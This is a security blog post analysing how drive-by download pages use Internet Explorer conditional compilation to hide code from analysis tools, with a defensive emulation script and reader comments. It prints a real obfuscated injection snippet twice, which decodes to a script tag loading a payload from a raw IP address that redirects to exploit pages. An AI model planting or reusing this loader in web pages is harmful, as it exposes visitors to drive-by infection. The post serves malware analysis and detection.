JavaScript anti-analysis tricks: IE conditional compilation

An anti-analysis/fingerprinting trick I've noticed more and more frequently in drive-by downloads is the use of IE conditional compilation.

Conditional compilation is a feature of Internet Explorer that enables the browser to control the compilation of a script (that is, to include or exclude code to be interpreted) depending on the values of a number of conditional compilation variables. Predefined variables provide information about the client environment, such as its processor, OS, and JavaScript version. Conditional compilation statements are typically contained in regular JavaScript comments to prevent problems with browsers that do not support this feature.

Here is an example of how conditional compilation is used in drive-by downloads:

/*@cc_on @*/
/*@if (@_win32)
var source ="=tdsjqu!uzqf>#ufyu0kbwbtdsjqu#!tsd>#iuuq;00:6" +
    "/23:/255/33:0tubut0tubut/kt#?=0tdsjqu?";
var result = "";
for(var i=0;i<source.length;i++)
    result+=String.fromCharCode(source.charCodeAt(i)-1);
document.write(result);
/*@end @*/

The cc_on statement enables conditional compilation. The @if statement checks that the browser is running on a Win32 system. If this is the case, then the following JavaScript block is interpreted, otherwise it is simply ignored. The code block is a classic deobfuscation routine that produces the following text:

<script type="text/javascript" 
    src="http://95.129.144.229/stats/stats.js"></script>

This script tag fetches a script that redirects to a number of pages serving exploits.

What happens if the user's browser does not support conditional compilation, for example because it is an analysis tool based on the stock SpiderMonkey or Rhino engines? It simply treats the entire conditional compilation section as a comment and skips it. As a consequence, the malicious script tag is never added to the page, so the subsequent exploits are neither launched nor detected by the analysis tool.
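An analysis engine that is not IE can avoid this blind spot by preprocessing the script the way IE's JScript parser would before evaluating it. The function below is an added example, not code from the original post or from Wepawet; the variable table (CC_VARS), the function names and the sample input (the page's own snippet, embedded as a constructed string) are assumptions of this example.

```javascript
// Emulate IE conditional compilation so a non-IE analysis engine does not
// silently skip the hidden block. Assumed values for the predefined
// variables of the client we want to emulate (a Win32 IE).
const CC_VARS = { "@_win32": true, "@_win16": false, "@_mac": false, "@_jscript": true };

// Detection: any script carrying @cc_on deserves a closer look.
function hasConditionalCompilation(js) {
  return /\/\*@cc_on\b/.test(js);
}

// What a stock SpiderMonkey/Rhino engine sees: every /* ... */ is a comment.
function asNonIeEngineSees(js) {
  return js.replace(/\/\*[\s\S]*?\*\//g, "");
}

// What IE sees once cc_on is active: "/*@" and "@*/" stop being comment
// delimiters (the "@" is shared with the directive that follows), and
// @if (var) ... [@else ...] @end is resolved against the variable table.
// Only a single, optionally negated, predefined variable is supported as the
// condition; anything else is left in place so the analyst notices it.
function unwrapConditionalCompilation(js, vars = CC_VARS) {
  if (!hasConditionalCompilation(js)) return js;
  let out = js.replace(/\/\*@/g, "@").replace(/@\*\//g, "");
  out = out.replace(/@cc_on\b/g, "");
  const block = /@if\s*\(\s*(!?)\s*(@_\w+)\s*\)([\s\S]*?)(?:@else([\s\S]*?))?@end/g;
  return out.replace(block, (m, neg, name, thenPart, elsePart = "") => {
    let cond = Boolean(vars[name]);
    if (neg) cond = !cond;
    return cond ? thenPart : elsePart;
  });
}

// Constructed sample: the snippet from the post above.
const SAMPLE = `/*@cc_on @*/
/*@if (@_win32)
var source ="=tdsjqu!uzqf>#ufyu0kbwbtdsjqu#!tsd>#iuuq;00:6" +
    "/23:/255/33:0tubut0tubut/kt#?=0tdsjqu?";
var result = "";
for(var i=0;i<source.length;i++)
    result+=String.fromCharCode(source.charCodeAt(i)-1);
document.write(result);
/*@end @*/`;

console.log("non-IE view:\n" + asNonIeEngineSees(SAMPLE));   // empty: block skipped
console.log("IE view:\n" + unwrapConditionalCompilation(SAMPLE)); // hidden code exposed
```

Feeding the unwrapped text to the analysis engine makes the document.write call execute, so the injected script tag is observed instead of being lost in a comment.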

The full report for the example is available on Wepawet.


  1. andy May 18, 2009

    How can you help me to remove "/@cc_on @/^M /@if (@_win32)^M var source ="=tdsjqu!uzqf>#ufyu0kbwbtdsjqu#!tsd>#iuuq;00:6" +^M "/23:/255/33:0tubut0tubut/kt#?=0tdsjqu?";^M var result = "";^M for(var i=0;i@end @*/^M ". I would like to remove this permanently. I did it several times and it keeps on coming back.

  2. Nohel May 22, 2009

    I'm a UCSB grad from back in 2004. I graduated with Sociology, but have since gotten into internet marketing, blogging, web development etc. I just started taking courses in programming and coding. We just covered a basic intro to Javascript so I'm finding your posts really interesting.

    Do you have any recommendations as to what resources I should read to better my understanding of Javascript? I'm probably at an intermediate level in xhtml/html... not a pro by far, but a little better than a noob :-)

    Thanks!

  3. David Hoffman June 5, 2009

    One of the sites I manage was hit by this one. Thanks for the detailed description. I like your blog and plan on following it.